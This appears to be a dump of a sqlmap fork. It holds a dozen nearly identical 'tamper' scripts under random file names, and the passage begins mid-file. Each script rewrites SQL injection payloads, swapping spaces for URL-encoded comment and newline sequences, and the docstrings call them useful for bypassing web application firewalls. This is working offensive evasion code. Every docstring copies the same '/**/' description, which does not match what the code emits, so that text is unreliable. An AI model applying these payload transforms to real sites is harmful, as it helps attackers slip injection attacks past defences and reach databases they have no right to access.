"" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/* %0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/* %0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/akWiTqmb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*!%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*!%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/fK4cXmhM.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*`%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*`%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/jPkopBzE.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*%0f%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*%0f%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/lw35khJV.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*=%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*=%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/nNkdOoSI.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*%0b%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*%0b%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/pkROU2yh.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/**/%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/**/%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/tm9qS0NR.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*/*!%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*/*!%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/tsi0Jpkc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/**%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/**%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/wYVnJQl7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*-%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*-%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/xY6FuKhe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/**//*!%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/**//*!%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/zKBxZXW5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*%0c%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*%0c%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal --------------------------------------------------------------------------------